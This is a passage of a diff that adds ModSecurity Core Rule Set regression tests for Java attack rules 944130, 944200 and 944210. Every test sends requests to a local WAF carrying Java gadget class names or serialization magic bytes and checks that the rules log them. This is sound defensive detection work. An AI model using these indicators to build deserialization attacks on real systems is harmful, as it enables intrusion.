javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: javax.script.ScriptEngineManager=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-389 + desc: "Request header test includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: javax.script.ScriptEngineManager + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-390 + desc: "XML attribute value includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-391 + desc: "XML element value includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_title: 944130-392 + desc: "Nested XML element value includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_title: 944130-393 + desc: "Content-Type text/plain includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_title: 944130-394 + desc: "Content-Type application/json arg value includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"javax.script.ScriptEngineManager\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-395 + desc: "Content-Type application/json arg name includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"javax.script.ScriptEngineManager\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-396 + desc: "Argument test includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_title: 944130-397 + desc: "Argument name includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "org.apache.commons=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-398 + desc: "Cookie test includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=org.apache.commons + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-399 + desc: "Cookie name includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: org.apache.commons=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-400 + desc: "Request header test includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: org.apache.commons + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-401 + desc: "XML attribute value includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-402 + desc: "XML element value includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_title: 944130-403 + desc: "Nested XML element value includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_title: 944130-404 + desc: "Content-Type text/plain includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_title: 944130-405 + desc: "Content-Type application/json arg value includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"org.apache.commons\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-406 + desc: "Content-Type application/json arg name includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"org.apache.commons\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-407 + desc: "Argument test includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_title: 944130-408 + desc: "Argument name includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "org.omg.CORBA=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-409 + desc: "Cookie test includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=org.omg.CORBA + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-410 + desc: "Cookie name includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: org.omg.CORBA=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-411 + desc: "Request header test includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: org.omg.CORBA + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-412 + desc: "XML attribute value includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-413 + desc: "XML element value includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_title: 944130-414 + desc: "Nested XML element value includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_title: 944130-415 + desc: "Content-Type text/plain includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_title: 944130-416 + desc: "Content-Type application/json arg value includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"org.omg.CORBA\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-417 + desc: "Content-Type application/json arg name includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"org.omg.CORBA\": \"test\"}" + output: + log_contains: "id \"944130\"" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml new file mode 100644 index 000000000..8ff2417c9 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml @@ -0,0 +1,28 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944200.yaml" + description: "Description" +tests: + - test_title: 944200-0FP + desc: Argument test includes java serialization magic bytes, raw request + stages: + - stage: + input: + stop_magic: true + dest_addr: "127.0.0.1" + port: 80 + raw_request: "POST / HTTP/1.0\r\nHost: localhost\r\nUser-Agent: ModSecurity CRS 3 Tests\r\nAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nAccept-Encoding: gzip,deflate\r\nAccept-Language: en-us,en;q=0.5\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 9\r\n\r\ntest=¬í\0\x05\r\n\r\n" + output: + no_log_contains: "id \"944200\"" + - test_title: 944200-1 + desc: Argument test includes java serialization magic bytes, base64 encoded request + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + encoded_request: "UE9TVCAvIEhUVFAvMS4wDQpIb3N0OiBsb2NhbGhvc3QNClVzZXItQWdlbnQ6IE1vZFNlY3VyaXR5IENSUyAzIFRlc3RzDQpBY2NlcHQ6IHRleHQveG1sLGFwcGxpY2F0aW9uL3htbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsdGV4dC9odG1sO3E9MC45LHRleHQvcGxhaW47cT0wLjgsaW1hZ2UvcG5nLCovKjtxPTAuNQ0KQWNjZXB0LUNoYXJzZXQ6IElTTy04ODU5LTEsdXRmLTg7cT0wLjcsKjtxPTAuNw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLGRlZmxhdGUNCkFjY2VwdC1MYW5ndWFnZTogZW4tdXMsZW47cT0wLjUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb250ZW50LUxlbmd0aDogOQ0KDQp0ZXN0PaztAAUNCg0K" + output: + log_contains: "id \"944200\"" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml new file mode 100644 index 000000000..b545ef09e --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml @@ -0,0 +1,1108 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944210.yaml" + description: "Positive tests for rule 944210" +tests: + - test_title: 944210-0 + desc: "Argument test includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_title: 944210-1 + desc: "Argument name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "rO0ABQ=test" + output: + log_contains: "id \"944210\"" + - test_title: 944210-2 + desc: "Cookie test includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=rO0ABQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-3 + desc: "Cookie name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: rO0ABQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-4 + desc: "Request header test includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: rO0ABQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-5 + desc: "XML element includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-6 + desc: "XML attribute name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-7 + desc: "XML attribute value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-8 + desc: "XML element value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_title: 944210-9 + desc: "Nested XML element value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_title: 944210-10 + desc: "Content-Type text/plain includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_title: 944210-11 + desc: "Content-Type application/json arg value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"rO0ABQ\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-12 + desc: "Content-Type application/json arg name includes keyword 